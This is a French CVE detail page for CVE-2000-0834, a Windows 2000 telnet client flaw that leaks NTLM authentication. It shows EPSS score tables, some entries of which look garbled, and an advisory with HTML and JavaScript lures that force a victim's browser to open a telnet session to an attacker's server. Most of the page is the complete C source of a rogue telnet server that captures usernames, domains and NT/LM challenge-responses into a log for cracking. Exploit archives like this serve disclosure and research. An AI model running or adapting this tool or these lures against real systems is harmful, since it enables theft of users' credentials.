CVE-2000-0834 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	25.6%	–	–
2022-04-03	–	–	25.6%	–	–
2023-03-12	–	–	–	2.67%	–
2024-02-11	–	–	–	2.67%	–
2024-06-02	–	–	–	2.67%	–
2024-06-30	–	–	–	2.67%	–
2024-08-04	–	–	–	2.67%	–
2024-08-11	–	–	–	2.67%	–
2024-12-22	–	–	–	2.03%	–
2025-01-19	–	–	–	2.03%	–
2025-03-18	–	–	–	–	18.36%
2025-03-18	–	–	–	–	18.36,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	96%
2022-04-03	97%
2023-03-12	89%
2024-02-11	9%
2024-06-02	9%
2024-06-30	91%
2024-08-04	9%
2024-08-11	91%
2024-12-22	89%
2025-01-19	89%
2025-03-18	95%
2025-03-18	95%

source: https://www.securityfocus.com/bid/1683/info By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack." Forcing a telnet session on a remote target is a trivial task because products such as Microsoft Internet Explorer, Outlook (Express), Netscape Navigator, etc. will automatically open URLs with a "telnet://" prefix in a default telnet client (which is normally telnet.exe). The following are some examples of how one could open a telnet session on a specified rogue server: 1) frame src=telnet://target 2) meta http-equiv="refresh" content="0;URL=telnet://telnet-attacker" 3) window.open("telnet://target") /* TalkNTLM - NTLM Logging Telnet Server * dildog@atstake.com * 8/14/00 * Copyright (C) 2000 @stake, Inc. */ #include<stdio.h> #include<string.h> #include<unistd.h> #include<stdlib.h> #include<ctype.h> #include<sys/socket.h> #include<sys/types.h> #include<sys/wait.h> #include<netinet/in.h> #include<arpa/inet.h> #define MAJOR_VERSION 1 #define MINOR_VERSION 0 #define IAC 255 /* interpret as command: */ #define DONT 254 /* you are not to use option */ #define DO 253 /* please, you use option */ #define WONT 252 /* I won't use option */ #define WILL 251 /* I will use option */ #define SB 250 /* interpret as subnegotiation */ #define SE 240 /* end sub negotiation */ #define AUTH 37 #define IS 0 #define SEND 1 #define REPLY 2 #define NAME 3 #define NTLM 15 #define ACCEPT 1 typedef enum { METHOD_NONE=0, METHOD_TELNET } METHOD; typedef enum { SUBMETHOD_NONE=0, SUBMETHOD_LOG, } SUBMETHOD; #define COMMSOCK_BUFSIZ 2048 FILE *g_fCommSock; char g_CommSockBuf[COMMSOCK_BUFSIZ]; void error(const char *str) { fflush(stdout); fprintf(stderr,str); fflush(stderr); } unsigned char getb(void) { unsigned char b=0; fread(&b,1,1,g_fCommSock); return b; } unsigned short getdwl(void) { unsigned short s=0; s|=((unsigned short)getb()); s|=((unsigned short)getb())<<8; return s; } unsigned long getddl(void) { unsigned long l=0; l|=((unsigned long)getb()); l|=((unsigned long)getb())<<8; l|=((unsigned long)getb())<<16; l|=((unsigned long)getb())<<24; return l; } void putb(unsigned char c) { fwrite(&c,1,1,g_fCommSock); } void putdwl(unsigned short w) { putb(w&255); putb((w>>8)&255); } void putddl(unsigned long d) { putb(d&255); putb((d>>8)&255); putb((d>>16)&255); putb((d>>24)&255); } void putarrb(int n, unsigned char *b) { int i; for(i=0;i<n;i++) { putb(b[i]); } } void putarrc(int n, char *c) { putarrb(n,(unsigned char *)c); } void putflush(void) { fflush(g_fCommSock); } void debugb(unsigned char c) { fprintf(stderr,"%d\t\t%X\t'%c'\n\r",c,c,(isalnum(c)?c:' ')); } int listenport(int port, struct sockaddr_in *rsaddr) { // Create socket int s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(s<0) { error("couldn't create socket.\n"); return -1; } int reuse=1; if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&reuse,sizeof(int))<0) { error("couldn't set socket option.\n"); close(s); return -2; } // Bind to port struct sockaddr_in saddr; memset(&saddr,0,sizeof(struct sockaddr_in)); saddr.sin_port=htons(port); saddr.sin_family=AF_INET; if(bind(s,(struct sockaddr *)&saddr,sizeof(struct sockaddr_in))<0) { error("couldn't bind.\n"); close(s); return -3; } // Listen on port; if(listen(s,1)<0) { error("couldn't listen.\n"); close(s); return -4; } // Accept connection unsigned int socklen=sizeof(struct sockaddr_in); memset(rsaddr,0,socklen); int as; if((as=accept(s,(struct sockaddr *)rsaddr,&socklen))<0) { error("couldn't accept.\n"); close(s); return -5; } // Close listener close(s); return as; } int do_telnet_log(int port, char *logfile) { FILE *lf=NULL; while(1) { // Wait for telnet connection to come in struct sockaddr_in saddr; int s; printf("listening on port %d.\n",port); if((s=listenport(port,&saddr))<0) { error("telnet logging abort.\n"); return -1; } printf("recieved telnet connection from %s:%u.\n", inet_ntoa(saddr.sin_addr),ntohs(saddr.sin_port)); // Set this socket as out buffered packet socket g_fCommSock=fdopen(s,"r+b"); if(g_fCommSock==NULL) { error("couldn't fdopen comm socket.\n"); close(s); return -2; } setvbuf(g_fCommSock,g_CommSockBuf,_IOFBF,COMMSOCK_BUFSIZ); // Open logging file lf=fopen(logfile,"a+t"); if(lf==NULL) { error("couldn't open log file.\n"); fclose(g_fCommSock); return -3; } // Challenge to send unsigned char challenge[8]={255,255,255,255,255,255,255,255}; // Start authentication process unsigned char *respbuf=NULL; int size=0; putb(IAC); putb(DO); putb(AUTH); putflush(); printf(">> IAC DO AUTH\n"); // See if client wants to authenticate if(getb()!=IAC) goto telnetlogfail; if(getb()!=WILL) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; printf("<< IAC WILL AUTH\n"); // Present authentication methods putb(IAC); putb(SB); putb(AUTH); putb(SEND); putb(NTLM); putb(0); putb(IAC); putb(SE); putflush(); printf(">> IAC SB AUTH SEND NTLM 0 IAC SE\n"); // Get NTLMSSP initial request if(getb()!=IAC) goto telnetlogfail; if(getb()!=SB) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; if(getb()!=IS) goto telnetlogfail; if(getb()!=NTLM) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; size=getddl()+4; if(size>2048) goto telnetlogfail; respbuf=(unsigned char *)malloc(size); int i; for(i=0;i<size;i++) { respbuf[i]=getb(); } free(respbuf); if(getb()!=IAC) goto telnetlogfail; if(getb()!=SE) goto telnetlogfail; printf("<< IAC SB AUTH IS NTLM 0 0 ... IAC SE\n"); // Send accept putb(IAC); putb(SB); putb(AUTH); putb(REPLY); putb(NTLM); putb(0); putb(ACCEPT); putddl(0xA8); putddl(0x2); putarrc(8,"NTLMSSP"); putddl(0x2); putdwl(0x14); putdwl(0x14); putddl(0x30); putddl(0xE0828295); putarrb(8,challenge); putarrc(8,"\0\0\0\0\0\0\0\0"); putdwl(0x64); putdwl(0x64); putddl(0x44); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x2); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x1); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x4); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putdwl(0x3); putdwl(0x14); putarrc(20,"A\0B\0C\0D\0E\0F\0G\0H\0I\0J\0"); putddl(0); putb(IAC); putb(SE); putflush(); printf(">> IAC SB AUTH REPLY NTLM 0 1 ... challenge ... IAC SE\n"); // Get the reply packet if(getb()!=IAC) goto telnetlogfail; if(getb()!=SB) goto telnetlogfail; if(getb()!=AUTH) goto telnetlogfail; if(getb()!=IS) goto telnetlogfail; if(getb()!=NTLM) goto telnetlogfail; if(getb()!=0) goto telnetlogfail; if(getb()!=2) goto telnetlogfail; size=getddl()+4; if(size>2048 || size<64) goto telnetlogfail; printf("8\n"); respbuf=(unsigned char *)malloc(size); for(i=0;i<size;i++) { respbuf[i]=getb(); //fprintf(stderr,"%2.2X: ",i); //debugb(respbuf[i]); } if(getb()!=IAC) goto telnetlogfail; if(getb()!=SE) goto telnetlogfail; printf("<< IAC SB AUTH IS NTLM 0 2 ... response ... IAC SE\n"); // Get username int usernamelen,usernameoff; char *username; usernamelen=respbuf[0x28] | (respbuf[0x29]<<8); usernameoff=respbuf[0x2C] | (respbuf[0x2D]<<8) | (respbuf[0x2E]<<16) | (respbuf[0x2F]<<24); username=(char *)malloc(usernamelen); if(!username) goto telnetlogfail; memcpy(username,&respbuf[usernameoff+4],usernamelen); printf("Username: "); for(i=0;i<usernamelen;i+=2) { printf("%c",username[i]); fprintf(lf,"%c",username[i]); username[i>>1]=username[i]; } usernamelen>>=1; printf("\n"); fprintf(lf,":"); free(username); // Get domainname int domainnamelen,domainnameoff; char *domainname; domainnamelen=respbuf[0x20] | (respbuf[0x21]<<8); domainnameoff=respbuf[0x24] | (respbuf[0x25]<<8) | (respbuf[0x26]<<16) | (respbuf[0x27]<<24); domainname=(char *)malloc(domainnamelen); if(!domainname) goto telnetlogfail; memcpy(domainname,&respbuf[domainnameoff+4],domainnamelen); printf("Domain: "); for(i=0;i<domainnamelen;i+=2) { printf("%c",domainname[i]); fprintf(lf,"%c",username[i]); domainname[i>>1]=domainname[i]; } domainnamelen>>=1; printf("\n"); fprintf(lf,":"); free(domainname); // Write challenge fprintf(lf,"%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X%2.2X:", challenge[0],challenge[1],challenge[2],challenge[3], challenge[4],challenge[5],challenge[6],challenge[7]); // Get NT response int ntresplen,ntrespoff; unsigned char *ntresp; ntresplen=respbuf[0x10] | (respbuf[0x11]<<8); ntrespoff=respbuf[0x14];// | (respbuf[0x15]<<8) | (respbuf[0x16]<<16) | (respbuf[0x17]<<24); ntresp=(unsigned char *)malloc(ntresplen); if(!ntresp) goto telnetlogfail; memcpy(ntresp,&respbuf[ntrespoff+4],ntresplen); printf("NT Response:\n"); for(i=0;i<ntresplen;i++) { printf("%2.2X ",ntresp[i]); fprintf(lf,"%2.2X",ntresp[i]); if(i%8==7) printf("\n"); } printf("\n"); fprintf(lf,":"); free(ntresp); // Get LM response int lmresplen,lmrespoff; unsigned char *lmresp; lmresplen=respbuf[0x18] | (respbuf[0x19]<<8); lmrespoff=respbuf[0x1C] | (respbuf[0x1D]<<8) | (respbuf[0x1E]<<16) | (respbuf[0x1F]<<24); lmresp=(unsigned char *)malloc(lmresplen); if(!lmresp) goto telnetlogfail; memcpy(lmresp,&respbuf[lmrespoff+4],lmresplen); printf("LM Response:\n"); for(i=0;i<lmresplen;i++) { printf("%2.2X ",lmresp[i]); fprintf(lf,"%2.2X",lmresp[i]); if(i%8==7) printf("\n"); } printf("\n"); fprintf(lf,"\n"); free(lmresp); free(respbuf); fclose(lf); // Close the telnet session fclose(g_fCommSock); printf("closed telnet socket.\n"); } return 0; telnetlogfail:; // Failure if(lf!=NULL) fclose(lf); printf("telnet negotiation failed.\n"); fclose(g_fCommSock); return -5; } void usage(char *progname,int exitcode) { printf("talkntlm v%d.%d (%s)\n",MAJOR_VERSION,MINOR_VERSION,progname); printf("usage: talkntlm -t [-p <port>] -l <challenge response logfile>\n",progname); exit(exitcode); } int main(int argc, char *argv[]) { unsigned char b; int i,tp; // Get options int opt_port=0; char *opt_logfile=NULL; METHOD opt_method=METHOD_NONE; SUBMETHOD opt_submethod=SUBMETHOD_NONE; char oc; while((oc=getopt(argc,argv,"l:p:t"))>0) { switch(oc) { case 't': opt_method=METHOD_TELNET; if(opt_port==0) { opt_port=23; } break; case 'p': opt_port=atoi(optarg); break; case 'l': opt_logfile=optarg; if(opt_submethod!=SUBMETHOD_NONE) usage(argv[0],-2); opt_submethod=SUBMETHOD_LOG; break; default: usage(argv[0],-3); break; } } // Go to the particular method if(opt_method==METHOD_NONE) { usage(argv[0],-4); } else if(opt_method==METHOD_TELNET) { // Telnet methods if(opt_submethod==SUBMETHOD_NONE) { usage(argv[0],-5); } else if(opt_submethod==SUBMETHOD_LOG) { // Telnet hash logging if(opt_logfile==NULL) { usage(argv[0],-7); } if(do_telnet_log(opt_port,opt_logfile)!=0) return -8; } } return 0; }